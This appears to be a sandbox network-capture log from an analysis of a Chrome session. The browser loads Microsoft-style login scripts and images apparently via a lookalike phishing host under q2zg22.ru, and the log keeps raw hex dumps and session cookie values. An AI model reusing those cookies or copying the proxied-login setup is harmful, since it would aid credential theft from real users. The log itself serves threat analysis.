                                                                                                                          55192.168.2.1649785104.21.85.1894435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:54 UTC1042OUTGET /Me.htm?v=3 HTTP/1.1
                                                                                                                          Host: ywnjb.q2zg22.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Sec-Fetch-Site: same-site
                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                          Sec-Fetch-Dest: iframe
                                                                                                                          Referer: https://office.q2zg22.ru/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; cf_clearance=DGVCDqJo4p8HXwiT2d9w7JleZ4qt8BY6c2qPP4YgtPs-1706901470-1-Acw5T7KtW0gzkNpwcfV200Vk3xmGo+jR5De1FJxtB8nNFB0tvSoBxYcHLUPxaQHxfbpp+xPD48APvvJqR81dSEE=; uaid=71c5bddea9a94fd68abbc95643963793; MSPRequ=id=N&lt=1706901473&co=3
                                                                                                                          2024-02-02 19:17:54 UTC1158INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:54 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                          Cache-Control: no-cache, no-store
                                                                                                                          Expires: Mon, 30 Jan 2034 19:17:54 GMT
                                                                                                                          P3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                          Ppserver: PPV: 30 H: SN1PEPF0000F87D V: 0
                                                                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                          Set-Cookie: uaid=b0dc3974b8144bacb6be6048a6beb6a3; Path=/; Domain=ywnjb.q2zg22.ru; HttpOnly; Secure; SameSite=None
                                                                                                                          Set-Cookie: MSPRequ=id=N&lt=1706901474&co=4; Path=/; Domain=ywnjb.q2zg22.ru; HttpOnly; Secure; SameSite=None
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Ms-Request-Id: 7aac6aea-ed9d-489c-ac91-5a3b85ad06e9
                                                                                                                          X-Ms-Route-Info: C106_SN1
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BkF7dnzaiiL1u%2FXBHLTxhDPjN8Vs%2B1KiPsRLmJDk%2BtB9Pu%2FphiZjT8KN9v%2BbbdKV5vXWfxNSynyn95I8HJ23PYssaeWvLNTHL9s4eGzud69SdDauXOVQJHQG49si1AMaMUc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 84f4c6e6dc2907d6-ATL
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-02-02 19:17:54 UTC211INData Raw: 39 31 39 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 21 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 29 7b 66 6f 72 28 76 61 72 20 65 20 69 6e 20 74 29 6e 5b 65 5d 3d 74 5b 65 5d 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 69 29 7b 69 66 28 65 5b 69 5d 29 72 65 74 75 72 6e 20 65 5b 69 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 73 3d 65 5b 69 5d 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 2c 69 64 3a 69 2c 6c 6f 61 64 65 64 3a 21 31 7d 3b 72 65 74 75 72 6e 20 6e 5b 69 5d 2e 63 61 6c 6c 28 73 2e 65 78 70 6f 72 74 73 2c 73 2c 73 2e 65 78 70 6f 72
                                                                                                                          Data Ascii: 919<script type="text/javascript">!function(n,t){for(var e in t)n[e]=t[e]}(this,function(n){function t(i){if(e[i])return e[i].exports;var s=e[i]={exports:{},id:i,loaded:!1};return n[i].call(s.exports,s,s.expor
                                                                                                                          2024-02-02 19:17:54 UTC1369INData Raw: 74 73 2c 74 29 2c 73 2e 6c 6f 61 64 65 64 3d 21 30 2c 73 2e 65 78 70 6f 72 74 73 7d 76 61 72 20 65 3d 7b 7d 3b 72 65 74 75 72 6e 20 74 2e 6d 3d 6e 2c 74 2e 63 3d 65 2c 74 2e 70 3d 22 22 2c 74 28 30 29 7d 28 5b 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 6e 29 7b 66 6f 72 28 76 61 72 20 74 3d 67 5b 63 5d 2c 65 3d 30 2c 69 3d 74 2e 6c 65 6e 67 74 68 3b 65 3c 69 3b 2b 2b 65 29 69 66 28 74 5b 65 5d 3d 3d 3d 6e 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 69 28 6e 29 7b 69 66 28 21 6e 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 66 6f 72 28 76 61 72 20 74 3d 6e 2b 22 3d 22 2c 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 2e 73 70 6c 69 74 28 22 3b 22 29 2c 69 3d 30 2c 73 3d 65 2e 6c 65 6e 67
                                                                                                                          Data Ascii: ts,t),s.loaded=!0,s.exports}var e={};return t.m=n,t.c=e,t.p="",t(0)}([function(n,t){function e(n){for(var t=g[c],e=0,i=t.length;e<i;++e)if(t[e]===n)return!0;return!1}function i(n){if(!n)return null;for(var t=n+"=",e=document.cookie.split(";"),i=0,s=e.leng
                                                                                                                          2024-02-02 19:17:54 UTC756INData Raw: 69 73 74 2c 65 29 7d 63 61 74 63 68 28 6f 29 7b 74 2e 65 72 72 6f 72 3d 6f 2e 6d 65 73 73 61 67 65 7d 6e 26 26 6c 2e 70 61 72 65 6e 74 2e 70 6f 73 74 4d 65 73 73 61 67 65 28 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 2c 6e 29 7d 76 61 72 20 6c 3d 77 69 6e 64 6f 77 2c 63 3d 22 70 72 6f 64 22 2c 70 3d 22 22 2c 66 3d 22 22 2c 64 3d 7b 4e 6f 6e 65 3a 30 2c 53 69 67 6e 65 64 49 6e 54 6f 52 50 3a 31 2c 53 69 67 6e 65 64 49 6e 54 6f 49 44 50 3a 32 2c 52 65 6d 65 6d 62 65 72 65 64 3a 33 7d 2c 75 3d 7b 4e 6f 6e 65 3a 30 2c 49 73 57 69 6e 64 6f 77 73 53 73 6f 3a 31 7d 2c 67 3d 7b 64 65 76 3a 5b 70 2c 66 5d 2c 22 69 6e 74 22 3a 5b 22 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 77 69 6e 64 6f 77 73 2d 70 70 65 2e 6e 65 74 22 5d 2c 70 72 6f 64 3a 5b 22 68 74 74
                                                                                                                          Data Ascii: ist,e)}catch(o){t.error=o.message}n&&l.parent.postMessage(JSON.stringify(t),n)}var l=window,c="prod",p="",f="",d={None:0,SignedInToRP:1,SignedInToIDP:2,Remembered:3},u={None:0,IsWindowsSso:1},g={dev:[p,f],"int":["https://login.windows-ppe.net"],prod:["htt
                                                                                                                          2024-02-02 19:17:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          56192.168.2.1649787152.199.4.444435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:55 UTC617OUTGET /shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_7582d7648944aa49d261.js HTTP/1.1
                                                                                                                          Host: aadcdn.msftauth.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                          Referer: https://office.q2zg22.ru/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-02-02 19:17:55 UTC750INHTTP/1.1 200 OK
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                          Age: 2406120
                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                          Content-MD5: 2VGb7WsUGKsKvDHsvFoXPg==
                                                                                                                          Content-Type: application/x-javascript
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:55 GMT
                                                                                                                          Etag: 0x8DC0CDF86C4011A
                                                                                                                          Last-Modified: Thu, 04 Jan 2024 04:42:15 GMT
                                                                                                                          Server: ECAcc (aga/8780)
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Cache: HIT
                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                          x-ms-request-id: b530f82c-301e-0014-542a-40460c000000
                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                          Content-Length: 113964
                                                                                                                          Connection: close
                                                                                                                          2024-02-02 19:17:55 UTC15652INData Raw: 2f 2a 21 0a 20 2a 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 20 53 54 41 52 54 20 4f 46 20 54 48 49 52 44 20 50 41 52 54 59 20 4e 4f 54 49 43 45 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 20 2a 20 0a 20 2a 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 62 61 73 65 64 20 6f 6e 20 6f 72 20 69 6e 63 6f 72 70 6f 72 61 74 65 73 20 6d 61 74 65 72 69 61 6c 20 66 72 6f 6d 20 74 68 65 20 70 72 6f 6a 65 63 74 73 20 6c 69 73 74 65 64 20 62 65 6c 6f 77 20 28 54 68 69 72 64 20 50 61 72 74 79 20 49 50 29 2e 20 54 68 65 20 6f 72 69 67 69 6e 61 6c 20 63 6f 70 79 72 69 67 68 74 20 6e 6f 74 69 63 65 20 61
                                                                                                                          Data Ascii: /*! * ------------------------------------------- START OF THIRD PARTY NOTICE ----------------------------------------- * * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice a
                                                                                                                          2024-02-02 19:17:55 UTC16383INData Raw: 72 6f 74 6f 63 6f 6c 7c 7c 67 2e 69 6e 64 65 78 4f 66 28 74 2e 70 72 6f 74 6f 63 6f 6c 29 3e 3d 30 29 29 74 72 79 7b 74 2e 68 6f 73 74 6e 61 6d 65 3d 70 2e 74 6f 55 6e 69 63 6f 64 65 28 74 2e 68 6f 73 74 6e 61 6d 65 29 7d 63 61 74 63 68 28 72 29 7b 7d 72 65 74 75 72 6e 20 6c 2e 64 65 63 6f 64 65 28 6c 2e 66 6f 72 6d 61 74 28 74 29 2c 6c 2e 64 65 63 6f 64 65 2e 64 65 66 61 75 6c 74 43 68 61 72 73 2b 22 25 22 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 2c 74 29 7b 69 66 28 21 28 74 68 69 73 20 69 6e 73 74 61 6e 63 65 6f 66 20 62 29 29 72 65 74 75 72 6e 20 6e 65 77 20 62 28 65 2c 74 29 3b 74 7c 7c 6e 2e 69 73 53 74 72 69 6e 67 28 65 29 7c 7c 28 74 3d 65 7c 7c 7b 7d 2c 65 3d 22 64 65 66 61 75 6c 74 22 29 2c 74 68 69 73 2e 69 6e 6c 69 6e 65 3d 6e 65 77 20 63 2c
                                                                                                                          Data Ascii: rotocol||g.indexOf(t.protocol)>=0))try{t.hostname=p.toUnicode(t.hostname)}catch(r){}return l.decode(l.format(t),l.decode.defaultChars+"%")}function b(e,t){if(!(this instanceof b))return new b(e,t);t||n.isString(e)||(t=e||{},e="default"),this.inline=new c,
                                                                                                                          2024-02-02 19:17:55 UTC16383INData Raw: 5c 75 30 34 35 31 22 2c 22 49 6f 67 6f 6e 22 3a 22 5c 75 30 31 32 65 22 2c 22 69 6f 67 6f 6e 22 3a 22 5c 75 30 31 32 66 22 2c 22 49 6f 70 66 22 3a 22 5c 75 64 38 33 35 5c 75 64 64 34 30 22 2c 22 69 6f 70 66 22 3a 22 5c 75 64 38 33 35 5c 75 64 64 35 61 22 2c 22 49 6f 74 61 22 3a 22 5c 75 30 33 39 39 22 2c 22 69 6f 74 61 22 3a 22 5c 75 30 33 62 39 22 2c 22 69 70 72 6f 64 22 3a 22 5c 75 32 61 33 63 22 2c 22 69 71 75 65 73 74 22 3a 22 5c 78 62 66 22 2c 22 69 73 63 72 22 3a 22 5c 75 64 38 33 35 5c 75 64 63 62 65 22 2c 22 49 73 63 72 22 3a 22 5c 75 32 31 31 30 22 2c 22 69 73 69 6e 22 3a 22 5c 75 32 32 30 38 22 2c 22 69 73 69 6e 64 6f 74 22 3a 22 5c 75 32 32 66 35 22 2c 22 69 73 69 6e 45 22 3a 22 5c 75 32 32 66 39 22 2c 22 69 73 69 6e 73 22 3a 22 5c 75 32 32 66
                                                                                                                          Data Ascii: \u0451","Iogon":"\u012e","iogon":"\u012f","Iopf":"\ud835\udd40","iopf":"\ud835\udd5a","Iota":"\u0399","iota":"\u03b9","iprod":"\u2a3c","iquest":"\xbf","iscr":"\ud835\udcbe","Iscr":"\u2110","isin":"\u2208","isindot":"\u22f5","isinE":"\u22f9","isins":"\u22f
                                                                                                                          2024-02-02 19:17:55 UTC734INData Raw: 32 35 33 22 2c 22 72 6c 61 72 72 22 3a 22 5c 75 32 31 63 34 22 2c 22 72 6c 68 61 72 22 3a 22 5c 75 32 31 63 63 22 2c 22 72 6c 6d 22 3a 22 5c 75 32 30 30 66 22 2c 22 72 6d 6f 75 73 74 61 63 68 65 22 3a 22 5c 75 32 33 62 31 22 2c 22 72 6d 6f 75 73 74 22 3a 22 5c 75 32 33 62 31 22 2c 22 72 6e 6d 69 64 22 3a 22 5c 75 32 61 65 65 22 2c 22 72 6f 61 6e 67 22 3a 22 5c 75 32 37 65 64 22 2c 22 72 6f 61 72 72 22 3a 22 5c 75 32 31 66 65 22 2c 22 72 6f 62 72 6b 22 3a 22 5c 75 32 37 65 37 22 2c 22 72 6f 70 61 72 22 3a 22 5c 75 32 39 38 36 22 2c 22 72 6f 70 66 22 3a 22 5c 75 64 38 33 35 5c 75 64 64 36 33 22 2c 22 52 6f 70 66 22 3a 22 5c 75 32 31 31 64 22 2c 22 72 6f 70 6c 75 73 22 3a 22 5c 75 32 61 32 65 22 2c 22 72 6f 74 69 6d 65 73 22 3a 22 5c 75 32 61 33 35 22 2c 22
                                                                                                                          Data Ascii: 253","rlarr":"\u21c4","rlhar":"\u21cc","rlm":"\u200f","rmoustache":"\u23b1","rmoust":"\u23b1","rnmid":"\u2aee","roang":"\u27ed","roarr":"\u21fe","robrk":"\u27e7","ropar":"\u2986","ropf":"\ud835\udd63","Ropf":"\u211d","roplus":"\u2a2e","rotimes":"\u2a35","
                                                                                                                          2024-02-02 19:17:55 UTC16383INData Raw: 72 6f 6e 22 3a 22 5c 75 30 31 36 30 22 2c 22 73 63 61 72 6f 6e 22 3a 22 5c 75 30 31 36 31 22 2c 22 53 63 22 3a 22 5c 75 32 61 62 63 22 2c 22 73 63 22 3a 22 5c 75 32 32 37 62 22 2c 22 73 63 63 75 65 22 3a 22 5c 75 32 32 37 64 22 2c 22 73 63 65 22 3a 22 5c 75 32 61 62 30 22 2c 22 73 63 45 22 3a 22 5c 75 32 61 62 34 22 2c 22 53 63 65 64 69 6c 22 3a 22 5c 75 30 31 35 65 22 2c 22 73 63 65 64 69 6c 22 3a 22 5c 75 30 31 35 66 22 2c 22 53 63 69 72 63 22 3a 22 5c 75 30 31 35 63 22 2c 22 73 63 69 72 63 22 3a 22 5c 75 30 31 35 64 22 2c 22 73 63 6e 61 70 22 3a 22 5c 75 32 61 62 61 22 2c 22 73 63 6e 45 22 3a 22 5c 75 32 61 62 36 22 2c 22 73 63 6e 73 69 6d 22 3a 22 5c 75 32 32 65 39 22 2c 22 73 63 70 6f 6c 69 6e 74 22 3a 22 5c 75 32 61 31 33 22 2c 22 73 63 73 69 6d 22
                                                                                                                          Data Ascii: ron":"\u0160","scaron":"\u0161","Sc":"\u2abc","sc":"\u227b","sccue":"\u227d","sce":"\u2ab0","scE":"\u2ab4","Scedil":"\u015e","scedil":"\u015f","Scirc":"\u015c","scirc":"\u015d","scnap":"\u2aba","scnE":"\u2ab6","scnsim":"\u22e9","scpolint":"\u2a13","scsim"
                                                                                                                          2024-02-02 19:17:55 UTC16383INData Raw: 2c 63 3c 30 3f 6c 2e 70 75 73 68 28 5b 22 63 6c 61 73 73 22 2c 72 2e 6c 61 6e 67 50 72 65 66 69 78 2b 64 5d 29 3a 28 6c 5b 63 5d 3d 6c 5b 63 5d 2e 73 6c 69 63 65 28 29 2c 6c 5b 63 5d 5b 31 5d 2b 3d 22 20 22 2b 72 2e 6c 61 6e 67 50 72 65 66 69 78 2b 64 29 2c 70 3d 7b 61 74 74 72 73 3a 6c 7d 2c 22 3c 70 72 65 3e 3c 63 6f 64 65 22 2b 69 2e 72 65 6e 64 65 72 41 74 74 72 73 28 70 29 2b 22 3e 22 2b 61 2b 22 3c 2f 63 6f 64 65 3e 3c 2f 70 72 65 3e 5c 6e 22 29 3a 22 3c 70 72 65 3e 3c 63 6f 64 65 22 2b 69 2e 72 65 6e 64 65 72 41 74 74 72 73 28 68 29 2b 22 3e 22 2b 61 2b 22 3c 2f 63 6f 64 65 3e 3c 2f 70 72 65 3e 5c 6e 22 7d 2c 69 2e 69 6d 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 2c 6e 2c 73 29 7b 76 61 72 20 6f 3d 65 5b 74 5d 3b 72 65 74 75 72 6e 20 6f
                                                                                                                          Data Ascii: ,c<0?l.push(["class",r.langPrefix+d]):(l[c]=l[c].slice(),l[c][1]+=" "+r.langPrefix+d),p={attrs:l},"<pre><code"+i.renderAttrs(p)+">"+a+"</code></pre>\n"):"<pre><code"+i.renderAttrs(h)+">"+a+"</code></pre>\n"},i.image=function(e,t,r,n,s){var o=e[t];return o
                                                                                                                          2024-02-02 19:17:55 UTC16383INData Raw: 6e 74 5b 74 5d 2d 65 2e 62 6c 6b 49 6e 64 65 6e 74 3e 3d 34 29 62 72 65 61 6b 3b 66 6f 72 28 4c 3d 21 31 2c 63 3d 30 2c 64 3d 7a 2e 6c 65 6e 67 74 68 3b 63 3c 64 3b 63 2b 2b 29 69 66 28 7a 5b 63 5d 28 65 2c 76 2c 72 2c 21 30 29 29 7b 4c 3d 21 30 3b 62 72 65 61 6b 7d 69 66 28 4c 29 62 72 65 61 6b 3b 69 66 28 68 29 7b 69 66 28 28 45 3d 6f 28 65 2c 76 29 29 3c 30 29 62 72 65 61 6b 3b 46 3d 65 2e 62 4d 61 72 6b 73 5b 76 5d 2b 65 2e 74 53 68 69 66 74 5b 76 5d 7d 65 6c 73 65 20 69 66 28 28 45 3d 73 28 65 2c 76 29 29 3c 30 29 62 72 65 61 6b 3b 69 66 28 5f 21 3d 3d 65 2e 73 72 63 2e 63 68 61 72 43 6f 64 65 41 74 28 45 2d 31 29 29 62 72 65 61 6b 7d 72 65 74 75 72 6e 28 52 3d 68 3f 65 2e 70 75 73 68 28 22 6f 72 64 65 72 65 64 5f 6c 69 73 74 5f 63 6c 6f 73 65 22 2c
                                                                                                                          Data Ascii: nt[t]-e.blkIndent>=4)break;for(L=!1,c=0,d=z.length;c<d;c++)if(z[c](e,v,r,!0)){L=!0;break}if(L)break;if(h){if((E=o(e,v))<0)break;F=e.bMarks[v]+e.tShift[v]}else if((E=s(e,v))<0)break;if(_!==e.src.charCodeAt(E-1))break}return(R=h?e.push("ordered_list_close",
                                                                                                                          2024-02-02 19:17:55 UTC15663INData Raw: 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 72 2c 6e 3d 30 2c 73 3d 65 2e 74 6f 6b 65 6e 73 2c 6f 3d 65 2e 74 6f 6b 65 6e 73 2e 6c 65 6e 67 74 68 3b 66 6f 72 28 74 3d 72 3d 30 3b 74 3c 6f 3b 74 2b 2b 29 73 5b 74 5d 2e 6e 65 73 74 69 6e 67 3c 30 26 26 6e 2d 2d 2c 73 5b 74 5d 2e 6c 65 76 65 6c 3d 6e 2c 73 5b 74 5d 2e 6e 65 73 74 69 6e 67 3e 30 26 26 6e 2b 2b 2c 22 74 65 78 74 22 3d 3d 3d 73 5b 74 5d 2e 74 79 70 65 26 26 74 2b 31 3c 6f 26 26 22 74 65 78 74 22 3d 3d 3d 73 5b 74 2b 31 5d 2e 74 79 70 65 3f 73 5b 74 2b 31 5d 2e 63 6f 6e 74 65 6e 74 3d 73 5b 74 5d 2e 63 6f 6e 74 65 6e 74 2b 73 5b 74 2b 31 5d 2e 63 6f 6e 74 65 6e 74 3a 28 74 21 3d 3d 72 26 26 28 73 5b 72 5d 3d 73 5b 74 5d 29 2c 72 2b 2b 29 3b 74 21 3d 3d 72 26 26 28 73 2e 6c 65 6e 67 74 68
                                                                                                                          Data Ascii: unction(e){var t,r,n=0,s=e.tokens,o=e.tokens.length;for(t=r=0;t<o;t++)s[t].nesting<0&&n--,s[t].level=n,s[t].nesting>0&&n++,"text"===s[t].type&&t+1<o&&"text"===s[t+1].type?s[t+1].content=s[t].content+s[t+1].content:(t!==r&&(s[r]=s[t]),r++);t!==r&&(s.length


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          57192.168.2.1649788152.199.4.444435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:55 UTC656OUTGET /shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg HTTP/1.1
                                                                                                                          Host: aadcdn.msftauth.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://office.q2zg22.ru/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-02-02 19:17:55 UTC738INHTTP/1.1 200 OK
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                          Age: 21436056
                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                          Content-MD5: R2FAVxfpONfnQAuxVxXbHg==
                                                                                                                          Content-Type: image/svg+xml
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:55 GMT
                                                                                                                          Etag: 0x8DB5C3F4BB4F03C
                                                                                                                          Last-Modified: Wed, 24 May 2023 10:11:52 GMT
                                                                                                                          Server: ECAcc (aga/86E2)
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Cache: HIT
                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                          x-ms-request-id: be4270d7-f01e-0076-7a16-93059f000000
                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                          Content-Length: 1592
                                                                                                                          Connection: close
                                                                                                                          2024-02-02 19:17:55 UTC1592INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 64 65 66 73 3e 3c 73 74 79 6c 65 3e 2e 61 7b 66 69 6c 6c 3a 6e 6f 6e 65 3b 7d 2e 62 7b 66 69 6c 6c 3a 23 34 30 34 30 34 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 64 65 66 73 3e 3c 72 65 63 74 20 63 6c 61 73 73 3d 22 61 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 62 22 20 64 3d 22 4d 34 30 2c 33 32 2e 35 37 38 56 34 30 48 33 32 56 33 36 48 32 38 56 33 32 48 32 34 56 32 38 2e 37 36 36 41 31 30 2e 36 38 39 2c 31 30 2e 36 38 39 2c 30 2c 30 2c
                                                                                                                          Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><defs><style>.a{fill:none;}.b{fill:#404040;}</style></defs><rect class="a" width="48" height="48"/><path class="b" d="M40,32.578V40H32V36H28V32H24V28.766A10.689,10.689,0,0,


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          58192.168.2.1649790152.199.4.444435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:55 UTC420OUTGET /shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg HTTP/1.1
                                                                                                                          Host: aadcdn.msftauth.net
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-02-02 19:17:55 UTC738INHTTP/1.1 200 OK
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                          Age: 21436056
                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                          Content-MD5: R2FAVxfpONfnQAuxVxXbHg==
                                                                                                                          Content-Type: image/svg+xml
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:55 GMT
                                                                                                                          Etag: 0x8DB5C3F4BB4F03C
                                                                                                                          Last-Modified: Wed, 24 May 2023 10:11:52 GMT
                                                                                                                          Server: ECAcc (aga/86E2)
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Cache: HIT
                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                          x-ms-request-id: be4270d7-f01e-0076-7a16-93059f000000
                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                          Content-Length: 1592
                                                                                                                          Connection: close
